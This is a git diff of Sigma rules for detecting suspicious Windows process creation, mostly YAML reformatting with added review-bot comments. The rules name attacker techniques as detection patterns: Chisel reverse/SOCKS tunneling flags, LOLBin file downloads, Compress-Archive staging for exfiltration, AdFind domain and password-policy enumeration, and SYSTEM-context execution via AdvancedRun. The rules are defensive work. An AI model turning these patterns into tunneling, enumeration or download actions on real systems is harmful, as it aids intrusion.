a/sigma/sysmon/process_creation/proc_creation_win_powershell_x509enrollment.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_x509enrollment.yml index 538f4deb0..38a4c5eb6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_x509enrollment.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_x509enrollment.yml @@ -1,8 +1,8 @@ title: Suspicious X509Enrollment - Process Creation id: 114de787-4eb2-48cc-abdb-c0b449f93ea4 related: - - id: 504d63cb-0dba-4d02-8531-e72981aace2c - type: similar + - id: 504d63cb-0dba-4d02-8531-e72981aace2c + type: similar status: test description: Detect use of X509Enrollment references: 
@@ -23,7 +23,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - X509Enrollment.CBinaryConverter - 884e2002-217d-11da-b2a4-000e7bbb2b09 condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_xor_commandline.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_xor_commandline.yml index 5e335765c..77593ee0c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_xor_commandline.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_xor_commandline.yml @@ -1,8 +1,8 @@ title: Suspicious XOR Encoded PowerShell Command id: bb780e0c-16cf-4383-8383-1e5471db6cf9 related: - - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 - type: obsoletes + - id: 5b572dcf-254b-425c-a8c5-d9af6bea35a6 + type: obsoletes status: test description: Detects presence of a potentially xor encoded powershell command references: @@ -10,8 +10,7 @@ references: - https://redcanary.com/blog/yellow-cockatoo/ - https://zero2auto.com/2020/05/19/netwalker-re/ - https://mez0.cc/posts/cobaltstrike-powershell-exec/ -author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, - oscd.community, Nasreddine Bencherchali +author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali date: 2018/09/05 modified: 2023/01/30 tags: 
@@ -29,18 +28,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll - - Description: Windows PowerShell - - Product: PowerShell Core 6 + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll + - Description: Windows PowerShell + - Product: PowerShell Core 6 selection_cli_xor: - CommandLine|contains: bxor + CommandLine|contains: bxor selection_cli_other: - CommandLine|contains: + CommandLine|contains: - ForEach - for( - 'for ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_zip_compress.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_zip_compress.yml index 9b6fba1e4..2f18edfb9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_zip_compress.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_zip_compress.yml 
@@ -1,22 +1,16 @@ title: Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet -id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 +id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation related: - - id: 71ff406e-b633-4989-96ec-bc49d825a412 - type: similar - - id: daf7eb81-35fd-410d-9d7a-657837e602bb - type: similar - - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 - type: similar + - id: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic + type: similar + - id: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module + type: similar + - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script + type: similar status: test -description: 'Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet - in order to compress folders and files where the output is stored in a potentially - suspicious location that is used often by malware for exfiltration. - - An adversary might compress data (e.g., sensitive documents) that is collected - prior to exfiltration in order to make it portable and minimize the amount of - data sent over the network. - - ' +description: | + Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. + An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a 
@@ -35,7 +29,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - Compress-Archive -Path*-DestinationPath $env:TEMP - Compress-Archive -Path*-DestinationPath*\AppData\Local\Temp\ - Compress-Archive -Path*-DestinationPath*:\Windows\Temp\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_presentationhost_download.yml b/sigma/sysmon/process_creation/proc_creation_win_presentationhost_download.yml index 158053d70..5932e69ed 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_presentationhost_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_presentationhost_download.yml @@ -1,8 +1,7 @@ title: Arbitrary File Download Via PresentationHost.EXE id: b124ddf4-778d-418e-907f-6dd3fc0d31cd status: test -description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" - (Browser Applications) files to download arbitrary files +description: Detects usage of "PresentationHost" which is a utility that runs ".xbap" (Browser Applications) files to download arbitrary files references: - https://github.com/LOLBAS-Project/LOLBAS/pull/239/files author: Nasreddine Bencherchali (Nextron Systems) @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \presentationhost.exe - - OriginalFileName: PresentationHost.exe + - Image|endswith: \presentationhost.exe + - OriginalFileName: PresentationHost.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - http:// - https:// - ftp:// diff --git a/sigma/sysmon/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml b/sigma/sysmon/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml index f0d199049..d210c26ae 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml @@ -1,11 +1,8 @@ title: XBAP Execution From Uncommon Locations Via PresentationHost.EXE id: d22e2925-cfd8-463f-96f6-89cec9d9bc5f status: test -description: 'Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE - from an uncommon location. These files can be abused to run malicious ".xbap" - files any bypass AWL - - ' +description: | + Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL references: - https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/ author: Nasreddine Bencherchali (Nextron Systems) @@ -24,12 +21,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \presentationhost.exe - - OriginalFileName: PresentationHost.exe + - Image|endswith: \presentationhost.exe + - OriginalFileName: PresentationHost.exe selection_cli: - CommandLine|contains: .xbap + CommandLine|contains: .xbap filter_main_generic: - CommandLine|contains: + CommandLine|contains: # Filter out legitimate locations if you find them - ' C:\Windows\' - ' C:\Program Files' condition: process_creation and (all of selection* and not 1 of filter_main_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml index 40b79cff5..dc86e296c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml 
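Review bot: The reflowed description in the first hunk still reads `files any bypass AWL`, which looks like a typo for `files and bypass AWL`; since the commit rewrites this line as a block scalar anyway, this is the moment to fix the wording, e.g. `These files can be abused to run malicious ".xbap" files and bypass AWL`. The second hunk in this section only re-indents the selection and keeps the existing `# Filter out legitimate locations if you find them` comment, so no detection logic changes there.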
@@ -1,11 +1,10 @@ title: Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution id: a20391f8-76fb-437b-abc0-dba2df1952c6 related: - - id: 65c3ca2c-525f-4ced-968e-246a713d164f - type: similar + - id: 65c3ca2c-525f-4ced-968e-246a713d164f + type: similar status: test -description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that - can be used to execute any other binary +description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary references: - https://twitter.com/mrd0x/status/1463526834918854661 - https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5 @@ -28,7 +27,6 @@ detection: ParentImage|endswith: \Microsoft.NodejsTools.PressAnyKey.exe condition: process_creation and selection falsepositives: - - Legitimate use by developers as part of NodeJS development with Visual Studio - Tools + - Legitimate use by developers as part of NodeJS development with Visual Studio Tools level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_print_remote_file_copy.yml b/sigma/sysmon/process_creation/proc_creation_win_print_remote_file_copy.yml index ee28cbb23..e3c19ce04 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_print_remote_file_copy.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_print_remote_file_copy.yml @@ -21,12 +21,12 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \print.exe - CommandLine|startswith: print - CommandLine|contains|all: + CommandLine|startswith: print + CommandLine|contains|all: - /D - .exe filter_print: - CommandLine|contains: print.exe + CommandLine|contains: print.exe condition: process_creation and (selection and not filter_print) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_protocolhandler_download.yml b/sigma/sysmon/process_creation/proc_creation_win_protocolhandler_download.yml index 213a5d03c..110d1855c 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_protocolhandler_download.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_protocolhandler_download.yml @@ -1,10 +1,8 @@ title: File Download Using ProtocolHandler.exe id: 104cdb48-a7a8-4ca7-a453-32942c6e5dcb status: test -description: 'Detects usage of "ProtocolHandler" to download files. Downloaded files - will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) - - ' +description: | + Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/ @@ -23,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \protocolhandler.exe - - OriginalFileName: ProtocolHandler.exe + - Image|endswith: \protocolhandler.exe + - OriginalFileName: ProtocolHandler.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ftp:// - http:// - https:// diff --git a/sigma/sysmon/process_creation/proc_creation_win_provlaunch_potential_abuse.yml b/sigma/sysmon/process_creation/proc_creation_win_provlaunch_potential_abuse.yml index 118b0a5cd..6769f4ebc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_provlaunch_potential_abuse.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_provlaunch_potential_abuse.yml 
@@ -1,15 +1,14 @@ title: Potential Provlaunch.EXE Binary Proxy Execution Abuse id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c related: - - id: f9999590-1f94-4a34-a91e-951e47bedefd - type: similar - - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 - type: similar - - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 - type: similar + - id: f9999590-1f94-4a34-a91e-951e47bedefd # CLI Abuse + type: similar + - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry + type: similar + - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry + type: similar status: experimental -description: Detects child processes of "provlaunch.exe" which might indicate potential - abuse to proxy execution. +description: Detects child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. references: - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ - https://twitter.com/0gtweet/status/1674399582162153472 @@ -29,25 +28,26 @@ detection: selection: ParentImage|endswith: \provlaunch.exe filter_main_covered_children: - - Image|endswith: - - \calc.exe - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \notepad.exe - - \powershell.exe - - \pwsh.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - Image|contains: - - :\PerfLogs\ - - :\Temp\ - - :\Users\Public\ - - \AppData\Temp\ - - \Windows\System32\Tasks\ - - \Windows\Tasks\ - - \Windows\Temp\ + # Note: this filter is here to avoid duplicate alerting by f9999590-1f94-4a34-a91e-951e47bedefd + - Image|endswith: + - \calc.exe + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \notepad.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - Image|contains: + - :\PerfLogs\ + - :\Temp\ + - :\Users\Public\ + - \AppData\Temp\ + - \Windows\System32\Tasks\ + - \Windows\Tasks\ + - \Windows\Temp\ condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_provlaunch_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_provlaunch_susp_child_process.yml index 09800e7db..468c6b312 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_provlaunch_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_provlaunch_susp_child_process.yml @@ -1,15 +1,14 @@ title: Suspicious Provlaunch.EXE Child Process id: f9999590-1f94-4a34-a91e-951e47bedefd related: - - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c - type: similar - - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 - type: similar - - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 - type: similar + - id: 7f5d1c9a-3e83-48df-95a7-2b98aae6c13c # CLI Generic + type: similar + - id: 2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25 # CLI Registry + type: similar + - id: 7021255e-5db3-4946-a8b9-0ba7a4644a69 # Registry + type: similar status: experimental -description: Detects suspicious child processes of "provlaunch.exe" which might indicate - potential abuse to proxy execution. +description: Detects suspicious child processes of "provlaunch.exe" which might indicate potential abuse to proxy execution. references: - https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/ - https://twitter.com/0gtweet/status/1674399582162153472 
@@ -29,25 +28,25 @@ detection: selection_parent: ParentImage|endswith: \provlaunch.exe selection_child: - - Image|endswith: - - \calc.exe - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \notepad.exe - - \powershell.exe - - \pwsh.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - Image|contains: - - :\PerfLogs\ - - :\Temp\ - - :\Users\Public\ - - \AppData\Temp\ - - \Windows\System32\Tasks\ - - \Windows\Tasks\ - - \Windows\Temp\ + - Image|endswith: + - \calc.exe + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \notepad.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - Image|contains: + - :\PerfLogs\ + - :\Temp\ + - :\Users\Public\ + - \AppData\Temp\ + - \Windows\System32\Tasks\ + - \Windows\Tasks\ + - \Windows\Temp\ condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_psr_capture_screenshots.yml b/sigma/sysmon/process_creation/proc_creation_win_psr_capture_screenshots.yml index 536898fcb..5853da3ce 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_psr_capture_screenshots.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_psr_capture_screenshots.yml @@ -1,8 +1,7 @@ title: Screen Capture Activity Via Psr.EXE id: 2158f96f-43c2-43cb-952a-ab4580f32382 status: test -description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility - used to record the user screen and clicks. +description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks. references: - https://lolbas-project.github.io/lolbas/Binaries/Psr/ - https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf 
@@ -23,7 +22,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \Psr.exe - CommandLine|contains: + CommandLine|contains: - /start - -start condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_3proxy_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_3proxy_execution.yml index 42cac0364..55b59cb0c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_3proxy_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_3proxy_execution.yml @@ -23,8 +23,8 @@ detection: Image|endswith: \3proxy.exe selection_pe: Description: 3proxy - tiny proxy server - selection_params: - CommandLine|contains: .exe -i127.0.0.1 -p + selection_params: # param combos seen in the wild + CommandLine|contains: .exe -i127.0.0.1 -p condition: process_creation and (1 of selection_*) falsepositives: - Administrative activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_adfind_enumeration.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_adfind_enumeration.yml index 330e498ce..cd42d3124 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_adfind_enumeration.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_adfind_enumeration.yml @@ -1,11 +1,10 @@ title: PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE id: 455b9d50-15a1-4b99-853f-8d37655a4c1b related: - - id: 9a132afa-654e-11eb-ae93-0242ac130002 - type: similar + - id: 9a132afa-654e-11eb-ae93-0242ac130002 + type: similar status: test -description: Detects active directory enumeration activity using known AdFind CLI - flags +description: Detects active directory enumeration activity using known AdFind CLI flags references: - https://www.joeware.net/freetools/tools/adfind/ - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx 
@@ -24,8 +23,8 @@ detection: process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational - selection_password: - CommandLine|contains: + selection_password: # Listing password policy + CommandLine|contains: - lockoutduration - lockoutthreshold - lockoutobservationwindow @@ -34,10 +33,10 @@ detection: - minpwdlength - pwdhistorylength - pwdproperties - selection_enum_ad: - CommandLine|contains: -sc admincountdmp - selection_enum_exchange: - CommandLine|contains: -sc exchaddresses + selection_enum_ad: # Enumerate Active Directory Admins + CommandLine|contains: -sc admincountdmp + selection_enum_exchange: # Enumerate Active Directory Exchange AD Objects + CommandLine|contains: -sc exchaddresses condition: process_creation and (1 of selection_*) falsepositives: - Authorized administrative activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_adfind_susp_usage.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_adfind_susp_usage.yml index d88551471..b2bc8e521 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_adfind_susp_usage.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_adfind_susp_usage.yml @@ -1,10 +1,10 @@ title: PUA - AdFind Suspicious Execution id: 9a132afa-654e-11eb-ae93-0242ac130002 related: - - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b - type: similar - - id: 75df3b17-8bcc-4565-b89b-c9898acef911 - type: obsoletes + - id: 455b9d50-15a1-4b99-853f-8d37655a4c1b + type: similar + - id: 75df3b17-8bcc-4565-b89b-c9898acef911 + type: obsoletes status: test description: Detects AdFind execution with common flags seen used during attacks references: 
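Review bot: The new selection comments in proc_creation_win_pua_adfind_enumeration.yml are a useful addition, but `# Enumerate Active Directory Exchange AD Objects` repeats "Active Directory" and "AD"; suggest `# Enumerate Exchange objects stored in AD` so it reads like the two sibling comments `# Listing password policy` and `# Enumerate Active Directory Admins`. The comment placement after the selection name matches the style used in the 3proxy hunk (`selection_params: # param combos seen in the wild`), which is good.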
@@ -15,8 +15,7 @@ references: - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx - https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1087.002/T1087.002.md#atomic-test-7---adfind---enumerate-active-directory-user-objects -author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, - oscd.community +author: Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community date: 2021/02/02 modified: 2023/03/05 tags: @@ -35,7 +34,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - domainlist - trustdmp - dcmodes diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml index 1df575759..58a2741e6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml @@ -1,8 +1,7 @@ title: PUA - Advanced IP Scanner Execution id: bef37fa2-f205-4a7b-b484-0759bfd5f86f status: test -description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for - ransomware groups. +description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups. references: - https://news.sophos.com/en-us/2019/12/09/snatch-ransomware-reboots-pcs-into-safe-mode-to-bypass-protection/ - https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html 
@@ -26,11 +25,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|contains: \advanced_ip_scanner - - OriginalFileName|contains: advanced_ip_scanner - - Description|contains: Advanced IP Scanner + - Image|contains: \advanced_ip_scanner # Covers also advanced_ip_scanner_console.exe + - OriginalFileName|contains: advanced_ip_scanner # Covers also advanced_ip_scanner_console.exe + - Description|contains: Advanced IP Scanner selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /portable - /lng condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_advanced_port_scanner.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_advanced_port_scanner.yml index 1282f60e6..eaa8102f4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_advanced_port_scanner.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_advanced_port_scanner.yml @@ -20,11 +20,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|contains: \advanced_port_scanner - - OriginalFileName|contains: advanced_port_scanner - - Description|contains: Advanced Port Scanner + - Image|contains: \advanced_port_scanner + - OriginalFileName|contains: advanced_port_scanner # Covers also advanced_port_scanner_console.exe + - Description|contains: Advanced Port Scanner selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /portable - /lng condition: process_creation and (1 of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_advancedrun.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_advancedrun.yml index bd9b76d7b..ed66bc9ab 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_advancedrun.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_advancedrun.yml 
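Review bot: The `# Covers also advanced_ip_scanner_console.exe` annotation is placed on both the `Image|contains` and the `OriginalFileName|contains` lines in proc_creation_win_pua_advanced_ip_scanner.yml, but the parallel hunk in proc_creation_win_pua_advanced_port_scanner.yml annotates only `OriginalFileName|contains`. `Image|contains: \advanced_port_scanner` is the same kind of substring match and covers the console binary the same way, so for consistency between the two rules add `- Image|contains: \advanced_port_scanner # Covers also advanced_port_scanner_console.exe`.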
@@ -1,8 +1,8 @@ title: PUA - AdvancedRun Execution id: d2b749ee-4225-417e-b20e-a8d2193cbb84 related: - - id: fa00b701-44c6-4679-994d-5a18afa8a707 - type: similar + - id: fa00b701-44c6-4679-994d-5a18afa8a707 + type: similar status: test description: Detects the execution of AdvancedRun utility references: @@ -29,14 +29,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - OriginalFileName: AdvancedRun.exe - - CommandLine|contains|all: - - ' /EXEFilename ' - - ' /Run' - - CommandLine|contains|all: - - ' /WindowState 0' - - ' /RunAs ' - - ' /CommandLine ' + - OriginalFileName: AdvancedRun.exe + - CommandLine|contains|all: + - ' /EXEFilename ' + - ' /Run' + - CommandLine|contains|all: + - ' /WindowState 0' + - ' /RunAs ' + - ' /CommandLine ' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml index 1ead55907..031b3cbe4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml @@ -1,11 +1,10 @@ title: PUA - AdvancedRun Suspicious Execution id: fa00b701-44c6-4679-994d-5a18afa8a707 related: - - id: d2b749ee-4225-417e-b20e-a8d2193cbb84 - type: similar + - id: d2b749ee-4225-417e-b20e-a8d2193cbb84 + type: similar status: test -description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, - SYSTEM, Local Service or Network Service accounts +description: Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts references: - https://twitter.com/splinter_code/status/1483815103279603714 - https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3 
@@ -27,20 +26,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: - /EXEFilename - /CommandLine selection_runas: - - CommandLine|contains: - - ' /RunAs 8 ' - - ' /RunAs 4 ' - - ' /RunAs 10 ' - - ' /RunAs 11 ' - - CommandLine|endswith: - - /RunAs 8 - - /RunAs 4 - - /RunAs 10 - - /RunAs 11 + - CommandLine|contains: + - ' /RunAs 8 ' + - ' /RunAs 4 ' + - ' /RunAs 10 ' + - ' /RunAs 11 ' + - CommandLine|endswith: + - /RunAs 8 + - /RunAs 4 + - /RunAs 10 + - /RunAs 11 condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_chisel.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_chisel.yml index 0c224fab7..5523b3397 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_chisel.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_chisel.yml @@ -1,8 +1,8 @@ title: PUA - Chisel Tunneling Tool Execution id: 8b0e12da-d3c3-49db-bb4f-256703f380e5 related: - - id: cf93e05e-d798-4d9e-b522-b0248dc61eaf - type: similar + - id: cf93e05e-d798-4d9e-b522-b0248dc61eaf + type: similar status: test description: Detects usage of the Chisel tunneling tool via the commandline arguments references: @@ -26,11 +26,11 @@ detection: selection_img: Image|endswith: \chisel.exe selection_param1: - CommandLine|contains: + CommandLine|contains: - 'exe client ' - 'exe server ' selection_param2: - CommandLine|contains: + CommandLine|contains: - -socks5 - -reverse - ' r:' diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_cleanwipe.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_cleanwipe.yml index cbc54f801..af26fcdb3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_cleanwipe.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_cleanwipe.yml 
@@ -22,13 +22,13 @@ detection: Image|endswith: \SepRemovalToolNative_x64.exe selection2: Image|endswith: \CATClean.exe - CommandLine|contains: --uninstall + CommandLine|contains: --uninstall selection3: Image|endswith: \NetInstaller.exe - CommandLine|contains: -r + CommandLine|contains: -r selection4: Image|endswith: \WFPUnins.exe - CommandLine|contains|all: + CommandLine|contains|all: - /uninstall - /enterprise condition: process_creation and (1 of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_crassus.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_crassus.yml index c5ff57eb2..44cf6378f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_crassus.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_crassus.yml @@ -1,8 +1,7 @@ title: PUA - Crassus Execution id: 2c32b543-1058-4808-91c6-5b31b8bed6c5 status: experimental -description: Detects Crassus, a Windows privilege escalation discovery tool, based - on PE metadata characteristics. +description: Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics. references: - https://github.com/vu-ls/Crassus author: pH-T (Nextron Systems) @@ -19,9 +18,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \Crassus.exe - - OriginalFileName: Crassus.exe - - Description|contains: Crassus + - Image|endswith: \Crassus.exe + - OriginalFileName: Crassus.exe + - Description|contains: Crassus condition: process_creation and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_pua_csexec.yml b/sigma/sysmon/process_creation/proc_creation_win_pua_csexec.yml index c783b6b46..ad6b619a5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_pua_csexec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_pua_csexec.yml 
